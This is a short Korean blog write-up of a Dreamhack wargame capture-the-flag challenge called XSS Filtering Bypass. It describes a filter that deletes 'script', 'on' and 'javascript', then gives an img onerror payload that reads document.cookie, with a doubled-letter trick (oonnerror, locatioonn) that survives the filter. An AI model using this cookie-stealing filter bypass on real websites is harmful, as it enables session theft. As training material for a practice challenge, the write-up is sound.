XSS Filtering Bypass

2024. 5. 25. 00:33웹 해킹/Dreamhack Wargame

XSS 취약점을 활용해 FLAG를 획득하는 문제

 

Code

기존의 문제와 차이점은 xss_filter함수가 존재하고 ‘script’, ‘on’, ‘javascript’를 필터링

필터링한 문자를 replace함수로 “”로 치환

Happy Path

vuln 페이지에서는 img 이미지 로딩을 실패한 상태가 나온다

 

xss를 발생시키는 <img>태그 구문은

<img src=x onerror=location.href=”/memo?memo”+document.cookie>

 

위의 필터를 우회하기 위해서 onerror ⇒ oonnerror

location ⇒ locatioonn

 

따라서 <img src=x oonnerror=locatioonn.href=”/memo?memo”+document.cookie>

 

FLAG

다음과 같이 flag가 출력된다

'웹 해킹 > Dreamhack Wargame' 카테고리의 다른 글

sql injection bypass WAF  (0) 2024.05.26
simple_sqli_chatgpt  (0) 2024.05.26
XSS Filtering Bypass Advanced  (0) 2024.05.25
XSS-2  (0) 2024.05.25
XSS-1  (0) 2024.05.25